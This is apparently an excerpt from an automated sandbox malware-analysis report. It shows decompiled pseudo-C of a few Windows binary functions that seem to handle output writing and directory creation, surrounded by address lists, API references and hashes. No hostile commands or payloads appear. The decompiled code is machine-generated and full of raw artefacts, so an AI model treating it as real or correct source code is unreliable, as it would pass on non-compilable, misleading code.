                                                                                                                    0x00b31de2
                                                                                                                    0x00b31dea
                                                                                                                    0x00b31def
                                                                                                                    0x00b31df5
                                                                                                                    0x00b31e16
                                                                                                                    0x00b31e1c
                                                                                                                    0x00b31e20
                                                                                                                    0x00b31e25
                                                                                                                    0x00b31e28
                                                                                                                    0x00b31e47
                                                                                                                    0x00b31e47
                                                                                                                    0x00b31e4a
                                                                                                                    0x00b31e7f
                                                                                                                    0x00b31e7f
                                                                                                                    0x00b31e81
                                                                                                                    0x00b31e81
                                                                                                                    0x00b31e84
                                                                                                                    0x00b31e87
                                                                                                                    0x00b31e8b
                                                                                                                    0x00b31ed6
                                                                                                                    0x00b31ee7
                                                                                                                    0x00b31e8d
                                                                                                                    0x00b31e8d
                                                                                                                    0x00b31e9b
                                                                                                                    0x00b31e9e
                                                                                                                    0x00b31ea2
                                                                                                                    0x00b31ea6
                                                                                                                    0x00b31eb2
                                                                                                                    0x00b31eb6
                                                                                                                    0x00b31eb9
                                                                                                                    0x00b31ebb
                                                                                                                    0x00b31ec3
                                                                                                                    0x00b31ec3
                                                                                                                    0x00b31ecb
                                                                                                                    0x00b31ecf
                                                                                                                    0x00b31ecf
                                                                                                                    0x00b31eea
                                                                                                                    0x00b31eec
                                                                                                                    0x00b31eee
                                                                                                                    0x00b31ef2
                                                                                                                    0x00b31ef7
                                                                                                                    0x00b31ef7
                                                                                                                    0x00b31efa
                                                                                                                    0x00b31efd
                                                                                                                    0x00b31eff
                                                                                                                    0x00b31eff
                                                                                                                    0x00b31f0a
                                                                                                                    0x00b31f0d
                                                                                                                    0x00b31f10
                                                                                                                    0x00b31f12
                                                                                                                    0x00b31f14
                                                                                                                    0x00b31f18
                                                                                                                    0x00b31f1a
                                                                                                                    0x00b31f1a
                                                                                                                    0x00000000
                                                                                                                    0x00b31f18
                                                                                                                    0x00b31e4c
                                                                                                                    0x00b31e4c
                                                                                                                    0x00b31e4f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31e51
                                                                                                                    0x00b31e53
                                                                                                                    0x00000000
                                                                                                                    0x00b31e53
                                                                                                                    0x00b31e2a
                                                                                                                    0x00b31e2d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31e2f
                                                                                                                    0x00b31e32
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31e3a
                                                                                                                    0x00b31e3f
                                                                                                                    0x00b31e41
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31e41
                                                                                                                    0x00b31c63
                                                                                                                    0x00b31c63
                                                                                                                    0x00b31c6d
                                                                                                                    0x00b31c72
                                                                                                                    0x00b31c81
                                                                                                                    0x00b31c86
                                                                                                                    0x00b31c88
                                                                                                                    0x00b31c8b
                                                                                                                    0x00b31c8f
                                                                                                                    0x00b31d88
                                                                                                                    0x00b31d88
                                                                                                                    0x00b31d8b
                                                                                                                    0x00b31dbb
                                                                                                                    0x00b31dbf
                                                                                                                    0x00000000
                                                                                                                    0x00b31dbf
                                                                                                                    0x00b31d8d
                                                                                                                    0x00b31d94
                                                                                                                    0x00b31d9c
                                                                                                                    0x00b31d9f
                                                                                                                    0x00b31da5
                                                                                                                    0x00b31da7
                                                                                                                    0x00b31dab
                                                                                                                    0x00b31f1f
                                                                                                                    0x00b31f3a
                                                                                                                    0x00b31f45
                                                                                                                    0x00b31f50
                                                                                                                    0x00b31f5e
                                                                                                                    0x00b31f66
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31c95
                                                                                                                    0x00b31c95
                                                                                                                    0x00b31c95
                                                                                                                    0x00b31c98
                                                                                                                    0x00b31cd8
                                                                                                                    0x00b31ce1
                                                                                                                    0x00b31ce2
                                                                                                                    0x00b31ce3
                                                                                                                    0x00b31ce8
                                                                                                                    0x00b31cea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31cf0
                                                                                                                    0x00b31cf6
                                                                                                                    0x00b31cfd
                                                                                                                    0x00b31cf8
                                                                                                                    0x00b31cf8
                                                                                                                    0x00b31cf8
                                                                                                                    0x00b31d00
                                                                                                                    0x00b31d02
                                                                                                                    0x00000000
                                                                                                                    0x00b31d04
                                                                                                                    0x00b31d04
                                                                                                                    0x00b31d04
                                                                                                                    0x00b31d07
                                                                                                                    0x00b31d11
                                                                                                                    0x00b31d11
                                                                                                                    0x00b31d14
                                                                                                                    0x00b31d53
                                                                                                                    0x00b31d53
                                                                                                                    0x00b31d56
                                                                                                                    0x00b31d6a
                                                                                                                    0x00b31d6d
                                                                                                                    0x00b31d78
                                                                                                                    0x00b31d78
                                                                                                                    0x00b31d78
                                                                                                                    0x00b31d7b
                                                                                                                    0x00000000
                                                                                                                    0x00b31d7b
                                                                                                                    0x00b31d61
                                                                                                                    0x00b31d66
                                                                                                                    0x00b31d68
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31d68
                                                                                                                    0x00b31d1f
                                                                                                                    0x00b31d24
                                                                                                                    0x00b31d26
                                                                                                                    0x00b31d50
                                                                                                                    0x00b31d50
                                                                                                                    0x00000000
                                                                                                                    0x00b31d50
                                                                                                                    0x00b31d31
                                                                                                                    0x00b31d35
                                                                                                                    0x00b31d38
                                                                                                                    0x00b31d44
                                                                                                                    0x00b31d48
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31d4a
                                                                                                                    0x00b31d4e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31d4e
                                                                                                                    0x00b31d3a
                                                                                                                    0x00b31d40
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31d42
                                                                                                                    0x00b31d09
                                                                                                                    0x00b31d0f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31d0f
                                                                                                                    0x00b31d02
                                                                                                                    0x00b31c9a
                                                                                                                    0x00b31c9d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31c9f
                                                                                                                    0x00b31ca2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31ca4
                                                                                                                    0x00b31ca7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31ca9
                                                                                                                    0x00b31cac
                                                                                                                    0x00b31cb2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31cb4
                                                                                                                    0x00b31cb7
                                                                                                                    0x00b31cba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31cc9
                                                                                                                    0x00b31cce
                                                                                                                    0x00b31cd0
                                                                                                                    0x00000000
                                                                                                                    0x00b31cd6
                                                                                                                    0x00000000
                                                                                                                    0x00b31cd6
                                                                                                                    0x00b31d7e
                                                                                                                    0x00b31d7e
                                                                                                                    0x00b31d7f
                                                                                                                    0x00b31d7f
                                                                                                                    0x00000000
                                                                                                                    0x00b31c95
                                                                                                                    0x00b31c74
                                                                                                                    0x00b31c74
                                                                                                                    0x00000000
                                                                                                                    0x00b31c74

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B31ADF
                                                                                                                      • Part of subcall function 00B15B2F: __EH_prolog.LIBCMT ref: 00B15B34
                                                                                                                      • Part of subcall function 00B22EE5: _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B22F13
                                                                                                                      • Part of subcall function 00B19312: VariantClear.OLEAUT32(?), ref: 00B19334
                                                                                                                    Strings
                                                                                                                    • Cannot create output directory, xrefs: 00B31E6F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ClearExceptionThrowVariant
                                                                                                                    • String ID: Cannot create output directory
                                                                                                                    • API String ID: 814188403-1181934277
                                                                                                                    • Opcode ID: 4433854413118f16d99ea12816ea8932363857490ef923025b5f452940b44a05
                                                                                                                    • Instruction ID: a1706d0dfd32f6aee62f8e5321dc3af8746622006750ce1da52c891f957e296b
                                                                                                                    • Opcode Fuzzy Hash: 4433854413118f16d99ea12816ea8932363857490ef923025b5f452940b44a05
                                                                                                                    • Instruction Fuzzy Hash: 5AF1AE71900289DFCF21EFA8C891AEEBBF9EF19300F6448E9E44567251DB309E85CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4B618 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B4B618(void* __ecx, void* __edi, char _a4) {
				signed int _v8;
				char* _v12;
				signed char* _t22;
				char* _t25;
				int _t29;
				signed int _t33;
				signed int _t40;
				void* _t46;
				intOrPtr* _t50;
				void* _t52;
				void* _t56;

				_push(__ecx);
				_push(__ecx);
				_t56 = __ecx;
				_t33 =  *(__ecx + 0x48);
				_v8 = _t33;
				if(_t33 != 0) {
					_t50 = __ecx + 0x50;
					_t24 = _t33 + 2;
					if(_t33 + 2 >  *((intOrPtr*)(_t50 + 8))) {
						E00B125C7(_t50, _t24);
					}
					_t25 =  *_t50;
					_v12 = _t25;
					 *_t25 = 0xd;
					_t7 = _t25 + 1; // 0x1
					_t46 = _t7;
					if(_t33 > 0) {
						_t52 = _t46;
						_t40 = _t33 >> 2;
						_t29 = memset(_t52, 0x20202020, _t40 << 2);
						_t46 = _t46 + _v8;
						memset(_t52 + _t40, _t29, (_t33 & 0x00000003) << 0);
						_t25 = _v12;
					}
					 *_t46 = 0xd;
					 *(_t46 + 1) =  *(_t46 + 1) & 0x00000000;
					 *((intOrPtr*)(_t56 + 0x54)) = _t46 + 1 - _t25;
					fputs( *(_t56 + 0x50),  *( *(_t56 + 0xa4))); // executed
				}
				if(_a4 != 0) {
					L00B11FDA( *(_t56 + 0xa4));
				}
				_t22 =  *(_t56 + 0x44);
				 *(_t56 + 0x48) =  *(_t56 + 0x48) & 0x00000000;
				 *_t22 =  *_t22 & 0x00000000;
				return _t22;
			}














                                                                                                                    0x00b4b61b
                                                                                                                    0x00b4b61c
                                                                                                                    0x00b4b61f
                                                                                                                    0x00b4b621
                                                                                                                    0x00b4b626
                                                                                                                    0x00b4b629
                                                                                                                    0x00b4b62c
                                                                                                                    0x00b4b62f
                                                                                                                    0x00b4b635
                                                                                                                    0x00b4b63a
                                                                                                                    0x00b4b63a
                                                                                                                    0x00b4b63f
                                                                                                                    0x00b4b643
                                                                                                                    0x00b4b646
                                                                                                                    0x00b4b649
                                                                                                                    0x00b4b649
                                                                                                                    0x00b4b64c
                                                                                                                    0x00b4b655
                                                                                                                    0x00b4b657
                                                                                                                    0x00b4b65a
                                                                                                                    0x00b4b661
                                                                                                                    0x00b4b664
                                                                                                                    0x00b4b666
                                                                                                                    0x00b4b666
                                                                                                                    0x00b4b669
                                                                                                                    0x00b4b66c
                                                                                                                    0x00b4b673
                                                                                                                    0x00b4b681
                                                                                                                    0x00b4b689
                                                                                                                    0x00b4b68e
                                                                                                                    0x00b4b696
                                                                                                                    0x00b4b696
                                                                                                                    0x00b4b69b
                                                                                                                    0x00b4b69e
                                                                                                                    0x00b4b6a4
                                                                                                                    0x00b4b6a8

                                                                                                                    APIs
                                                                                                                    • fputs.MSVCRT ref: 00B4B681
                                                                                                                      • Part of subcall function 00B125C7: _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B125E9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrowfputs
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1334390793-399585960
                                                                                                                    • Opcode ID: 0f62f2e3bc9df8e19dd43b34231a7d1a9decdcf78bb0f026444915928810cafe
                                                                                                                    • Instruction ID: 7214e1e49842a6ccd4899520ecf7715fcbbd246ad654761258acb2317858e816
                                                                                                                    • Opcode Fuzzy Hash: 0f62f2e3bc9df8e19dd43b34231a7d1a9decdcf78bb0f026444915928810cafe
                                                                                                                    • Instruction Fuzzy Hash: BA11BF716047449FDB15CF59C8C5BAAFBE6EF59304F0544AEE2468B290C7B1B944CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B44E72 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00B44E72(void* __ecx, void* __edi, intOrPtr _a4, char* _a8) {
				void* __ebp;
				void* _t18;
				char* _t23;
				struct _IO_FILE** _t38;
				void* _t40;

				_t40 = __ecx;
				_t18 = L00B4574E();
				if(_t18 == 0) {
					 *((intOrPtr*)(__ecx + 0x10c)) =  *((intOrPtr*)(__ecx + 0x10c)) + 1;
					asm("adc [eax+0x4], ebx");
					 *((char*)(__ecx + 0x114)) = 0;
					 *((char*)(__ecx + 0x115)) = 0;
					 *((intOrPtr*)(__ecx + 0x154)) = 0;
					 *((intOrPtr*)(__ecx + 0x158)) = 0;
					E00B44B28(__ecx - 4);
					_t38 =  *(__ecx + 0xc4);
					if(_t38 != 0) {
						_t23 =  *0xb8c1fc; // 0xb8c498
						if(_a8 == 0) {
							_t23 =  *0xb8c1f8; // 0xb8c4ac
						}
						_a8 = _t23;
						E00B11FE9(_t38);
						fputs(_a8,  *_t38); // executed
						_push(_a4);
						E00B12163( *((intOrPtr*)(_t40 + 0xc4))); // executed
						E00B11FE9( *((intOrPtr*)(_t40 + 0xc4)));
					}
					if( *((intOrPtr*)(_t40 + 0xb8)) != 0) {
						E00B1275A(_t40 + 0x2c, "Open");
					}
					return 0;
				}
				return _t18;
			}








                                                                                                                    0x00b44e77
                                                                                                                    0x00b44e79
                                                                                                                    0x00b44e82
                                                                                                                    0x00b44e88
                                                                                                                    0x00b44e99
                                                                                                                    0x00b44e9c
                                                                                                                    0x00b44ea2
                                                                                                                    0x00b44ea8
                                                                                                                    0x00b44eae
                                                                                                                    0x00b44eb4
                                                                                                                    0x00b44eb9
                                                                                                                    0x00b44ec1
                                                                                                                    0x00b44ec6
                                                                                                                    0x00b44ecb
                                                                                                                    0x00b44ecd
                                                                                                                    0x00b44ecd
                                                                                                                    0x00b44ed4
                                                                                                                    0x00b44ed7
                                                                                                                    0x00b44ee1
                                                                                                                    0x00b44ee9
                                                                                                                    0x00b44ef2
                                                                                                                    0x00b44efd
                                                                                                                    0x00b44efd
                                                                                                                    0x00b44f09
                                                                                                                    0x00b44f13
                                                                                                                    0x00b44f13
                                                                                                                    0x00000000
                                                                                                                    0x00b44f18
                                                                                                                    0x00b44f1d

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs
                                                                                                                    • String ID: Open
                                                                                                                    • API String ID: 1795875747-71445658
                                                                                                                    • Opcode ID: 1ec71c08058c23116b31b9c0ed5d28272feb3c9e5929bf28b2ed00c331c04b88
                                                                                                                    • Instruction ID: 878f8899927cdbe730ed21c2cea357c27bf9ab6ae98511d3b72aacd93622ea46
                                                                                                                    • Opcode Fuzzy Hash: 1ec71c08058c23116b31b9c0ed5d28272feb3c9e5929bf28b2ed00c331c04b88
                                                                                                                    • Instruction Fuzzy Hash: 40119A32105B009FD724EF74D895ADABBE5FB51310F4089AEE59A93162DB30AD54CF60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B245B7 Relevance: 3.3, APIs: 2, Instructions: 253COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E00B245B7(void* __ecx, void* __eflags) {
				void* _t80;
				signed int _t84;
				signed int _t89;
				signed int _t93;
				intOrPtr _t95;
				signed int _t99;
				long _t100;
				signed int _t101;
				signed int _t104;
				void* _t106;
				void* _t114;
				void* _t115;
				intOrPtr* _t119;
				signed int _t121;
				char _t124;
				void* _t143;
				signed int _t162;
				signed int _t176;
				void* _t179;
				signed int _t180;
				signed int _t182;
				void* _t183;

				L00B7F140(0xb83c0f, _t183);
				_t179 = __ecx;
				 *((char*)( *((intOrPtr*)(_t183 + 0xc)))) = 1;
				E00B16529(_t183 - 0x5c);
				E00B12D90(_t183 - 0x34);
				_t176 =  *(_t183 + 8);
				_t124 = 0;
				 *((intOrPtr*)(_t183 - 4)) = 0;
				_t80 = E00B169AB(_t183 - 0x5c,  *_t176, 0); // executed
				if(_t80 == 0) {
					_t180 = E00B185E5( *_t176, __eflags);
					__eflags = _t180;
					if(_t180 < 0) {
						L55:
						 *((char*)( *((intOrPtr*)(_t183 + 0xc)))) = _t124;
						E00B11E89( *((intOrPtr*)(_t183 + 0xc)),  *((intOrPtr*)(_t183 - 0x34)));
						_t84 = 0;
						__eflags = 0;
						L56:
						 *[fs:0x0] =  *((intOrPtr*)(_t183 - 0xc));
						return _t84;
					}
					__eflags =  *( *_t176 + 2 + _t180 * 2);
					if(__eflags == 0) {
						goto L55;
					}
					E00B12EA8(_t183 - 0x18, __eflags, _t176);
					__eflags = _t180 -  *(_t183 - 0x14);
					 *((char*)(_t183 - 4)) = 5;
					if(_t180 <  *(_t183 - 0x14)) {
						 *(_t183 - 0x14) = _t180;
						 *((short*)( *((intOrPtr*)(_t183 - 0x18)) + _t180 * 2)) = 0;
					}
					E00B16529(_t183 - 0xa0);
					E00B12D90(_t183 - 0x78);
					 *((char*)(_t183 - 4)) = 6;
					_t89 = E00B169AB(_t183 - 0xa0,  *((intOrPtr*)(_t183 - 0x18)), _t124);
					__eflags = _t89;
					if(_t89 != 0) {
						_t162 =  *(_t183 - 0x80);
						__eflags = _t162 & 0x00000001;
						if((_t162 & 0x00000001) != 0) {
							__eflags = _t162 & 0xfffffffe;
							_t89 = E00B157AB( *((intOrPtr*)(_t183 - 0x18)), _t162 & 0xfffffffe);
						}
					}
					E00B11E89(E00B11E89(_t89,  *((intOrPtr*)(_t183 - 0x78))),  *((intOrPtr*)(_t183 - 0x18)));
					L54:
					goto L55;
				}
				_t93 =  *(__ecx + 0x48);
				if(_t93 == 2) {
					L43:
					_t182 = 0;
					__eflags = 0;
					L44:
					E00B11E89(_t93,  *((intOrPtr*)(_t183 - 0x34)));
					L45:
					_t84 = _t182;
					goto L56;
				}
				if(_t93 != 0) {
					L20:
					_t95 =  *((intOrPtr*)(_t179 + 0x48));
					__eflags = _t95 - 3;
					if(__eflags != 0) {
						__eflags = _t95 - 4;
						if(__eflags != 0) {
							_t143 =  *_t176;
							__eflags =  *(_t183 - 0x3c) >> 0x00000004 & 0x00000001;
							if(__eflags == 0) {
								__eflags = L00B16F6C(_t143, __eflags);
								if(__eflags == 0) {
									goto L55;
								}
								_t99 = L00B15DB5( *_t176, __eflags);
								__eflags = _t99;
								if(_t99 != 0) {
									goto L55;
								}
								_t100 = GetLastError();
								__eflags = _t100 - 2;
								if(_t100 == 2) {
									goto L55;
								}
								_push(_t176);
								_push( *0xb8a38c);
								L42:
								_t93 = L00B23AF8(_t179);
								__eflags = _t93 - _t124;
								if(_t93 != _t124) {
									L23:
									_t182 = _t93;
									goto L44;
								}
								goto L43;
							}
							_t101 = L00B1584C(_t143);
							__eflags = _t101;
							if(_t101 != 0) {
								goto L55;
							}
							_push(_t176);
							_push( *0xb8a390);
							goto L42;
						}
						E00B12EA8(_t183 - 0x18, __eflags, _t176);
						 *((char*)(_t183 - 4)) = 4;
						__eflags = E00B1AC19(_t183 - 0x18, __eflags);
						if(__eflags != 0) {
							_t104 = L00B158CE( *_t176,  *((intOrPtr*)(_t183 - 0x18)));
							__eflags = _t104;
							if(_t104 != 0) {
								E00B11E89(_t104,  *((intOrPtr*)(_t183 - 0x18)));
								goto L54;
							}
							_t106 = L00B1729C();
							_push(_t176);
							_push(_t183 - 0x18);
							_push( *0xb8a388);
							_push(_t106);
							_t107 = L00B23B8E(_t179, __eflags);
							L31:
							__eflags = _t107 - _t124;
							_t182 = _t107;
							if(_t107 == _t124) {
								_t182 = 0x80004005;
							}
							_push( *((intOrPtr*)(_t183 - 0x18)));
							L13:
							E00B11E89(E00B11E89(_t107),  *((intOrPtr*)(_t183 - 0x34)));
							goto L45;
						}
						_push(_t176);
						_push( *0xb8a384);
						_t107 = L00B23A8B(_t179, __eflags);
						goto L31;
					}
					__eflags = E00B1AC19(_t176, __eflags);
					if(__eflags != 0) {
						 *((char*)(_t179 + 0x1f0)) = 1;
						goto L55;
					}
					_push(_t176);
					_push( *0xb8a384);
					_t93 = L00B23A8B(_t179, __eflags);
					__eflags = _t93 - _t124;
					if(_t93 == _t124) {
						_t182 = 0x80004005;
						goto L44;
					}
					goto L23;
				}
				_t114 = E00B248C8(_t176, _t183 - 0x68, L00B132A6(_t176) + 1);
				 *((char*)(_t183 - 4)) = 1;
				_t115 = E00B12D35(_t183 - 0x24, _t114, _t183 - 0x34);
				 *((char*)(_t183 - 4)) = 3;
				E00B11E89(_t115,  *((intOrPtr*)(_t183 - 0x68)));
				asm("sbb edx, edx");
				 *(_t183 - 0x14) =  *(_t183 - 0x44);
				asm("sbb edx, edx");
				 *((intOrPtr*)(_t183 - 0x10)) =  *((intOrPtr*)(_t183 - 0x40));
				_t119 =  *((intOrPtr*)(_t179 + 0x50));
				_t107 =  *((intOrPtr*)( *_t119 + 0x14))(_t119,  *((intOrPtr*)(_t183 - 0x24)), _t183 - 0x14, _t183 - 0x5c,  *((intOrPtr*)(_t179 + 0x80)),  ~( *(_t179 + 0xfb)) & _t179 + 0x000000f0,  ~( *(_t179 + 0x3b)) & _t179 + 0x00000108, _t183 + 8);
				_t124 = 0;
				if(_t107 == 0) {
					_t121 =  *(_t183 + 8);
					__eflags = _t121;
					if(_t121 == 0) {
						L19:
						 *((char*)(_t183 - 4)) = _t124;
						E00B11E89(_t121,  *((intOrPtr*)(_t183 - 0x24)));
						goto L20;
					}
					_t121 = _t121 - 1;
					__eflags = _t121;
					if(_t121 == 0) {
						 *((intOrPtr*)(_t179 + 0x48)) = 1;
						goto L19;
					}
					_t107 = _t121 - 1;
					__eflags = _t107;
					if(_t107 == 0) {
						L17:
						_t182 = 0;
						goto L12;
					}
					_t107 = _t107 - 1;
					__eflags = _t107;
					if(_t107 == 0) {
						 *((intOrPtr*)(_t179 + 0x48)) = 2;
						goto L17;
					}
					_t121 = _t107 - 1;
					__eflags = _t121;
					if(_t121 == 0) {
						 *((intOrPtr*)(_t179 + 0x48)) = 3;
						goto L19;
					}
					_t107 = _t121 == 1;
					__eflags = _t121 == 1;
					if(_t121 == 1) {
						_t182 = 0x80004004;
					} else {
						_t182 = 0x80004005;
					}
					goto L12;
				} else {
					_t182 = _t107;
					L12:
					_push( *((intOrPtr*)(_t183 - 0x24)));
					goto L13;
				}
			}

























                                                                                                                    0x00b245bc
                                                                                                                    0x00b245cc
                                                                                                                    0x00b245d2
                                                                                                                    0x00b245d5
                                                                                                                    0x00b245dd
                                                                                                                    0x00b245e2
                                                                                                                    0x00b245e5
                                                                                                                    0x00b245ed
                                                                                                                    0x00b245f1
                                                                                                                    0x00b245f8
                                                                                                                    0x00b2482d
                                                                                                                    0x00b2482f
                                                                                                                    0x00b24831
                                                                                                                    0x00b248a7
                                                                                                                    0x00b248ad
                                                                                                                    0x00b248af
                                                                                                                    0x00b248b5
                                                                                                                    0x00b248b5
                                                                                                                    0x00b248b7
                                                                                                                    0x00b248bd
                                                                                                                    0x00b248c5
                                                                                                                    0x00b248c5
                                                                                                                    0x00b24835
                                                                                                                    0x00b2483a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24840
                                                                                                                    0x00b24845
                                                                                                                    0x00b24848
                                                                                                                    0x00b2484c
                                                                                                                    0x00b24851
                                                                                                                    0x00b24854
                                                                                                                    0x00b24854
                                                                                                                    0x00b2485e
                                                                                                                    0x00b24866
                                                                                                                    0x00b24875
                                                                                                                    0x00b24879
                                                                                                                    0x00b2487e
                                                                                                                    0x00b24880
                                                                                                                    0x00b24882
                                                                                                                    0x00b24885
                                                                                                                    0x00b24888
                                                                                                                    0x00b2488d
                                                                                                                    0x00b24890
                                                                                                                    0x00b24890
                                                                                                                    0x00b24888
                                                                                                                    0x00b248a0
                                                                                                                    0x00b248a6
                                                                                                                    0x00000000
                                                                                                                    0x00b248a6
                                                                                                                    0x00b245fe
                                                                                                                    0x00b24604
                                                                                                                    0x00b24814
                                                                                                                    0x00b24814
                                                                                                                    0x00b24814
                                                                                                                    0x00b24816
                                                                                                                    0x00b24819
                                                                                                                    0x00b2481e
                                                                                                                    0x00b2481f
                                                                                                                    0x00000000
                                                                                                                    0x00b2481f
                                                                                                                    0x00b2460c
                                                                                                                    0x00b246fb
                                                                                                                    0x00b246fb
                                                                                                                    0x00b246fe
                                                                                                                    0x00b24701
                                                                                                                    0x00b2473d
                                                                                                                    0x00b24740
                                                                                                                    0x00b247b4
                                                                                                                    0x00b247b9
                                                                                                                    0x00b247bb
                                                                                                                    0x00b247d8
                                                                                                                    0x00b247da
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b247e2
                                                                                                                    0x00b247e7
                                                                                                                    0x00b247e9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b247ef
                                                                                                                    0x00b247f5
                                                                                                                    0x00b247f8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b247fe
                                                                                                                    0x00b247ff
                                                                                                                    0x00b24805
                                                                                                                    0x00b24807
                                                                                                                    0x00b2480c
                                                                                                                    0x00b2480e
                                                                                                                    0x00b24720
                                                                                                                    0x00b24720
                                                                                                                    0x00000000
                                                                                                                    0x00b24720
                                                                                                                    0x00000000
                                                                                                                    0x00b2480e
                                                                                                                    0x00b247bd
                                                                                                                    0x00b247c2
                                                                                                                    0x00b247c4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b247ca
                                                                                                                    0x00b247cb
                                                                                                                    0x00000000
                                                                                                                    0x00b247cb
                                                                                                                    0x00b24746
                                                                                                                    0x00b2474e
                                                                                                                    0x00b24757
                                                                                                                    0x00b24759
                                                                                                                    0x00b24770
                                                                                                                    0x00b24775
                                                                                                                    0x00b24777
                                                                                                                    0x00b247a7
                                                                                                                    0x00000000
                                                                                                                    0x00b247a7
                                                                                                                    0x00b24779
                                                                                                                    0x00b24781
                                                                                                                    0x00b24782
                                                                                                                    0x00b24785
                                                                                                                    0x00b2478b
                                                                                                                    0x00b2478c
                                                                                                                    0x00b24791
                                                                                                                    0x00b24791
                                                                                                                    0x00b24793
                                                                                                                    0x00b24795
                                                                                                                    0x00b24797
                                                                                                                    0x00b24797
                                                                                                                    0x00b2479c
                                                                                                                    0x00b246ba
                                                                                                                    0x00b246c2
                                                                                                                    0x00000000
                                                                                                                    0x00b246c7
                                                                                                                    0x00b2475b
                                                                                                                    0x00b2475e
                                                                                                                    0x00b24764
                                                                                                                    0x00000000
                                                                                                                    0x00b24764
                                                                                                                    0x00b2470a
                                                                                                                    0x00b2470c
                                                                                                                    0x00b24731
                                                                                                                    0x00000000
                                                                                                                    0x00b24731
                                                                                                                    0x00b2470e
                                                                                                                    0x00b24711
                                                                                                                    0x00b24717
                                                                                                                    0x00b2471c
                                                                                                                    0x00b2471e
                                                                                                                    0x00b24727
                                                                                                                    0x00000000
                                                                                                                    0x00b24727
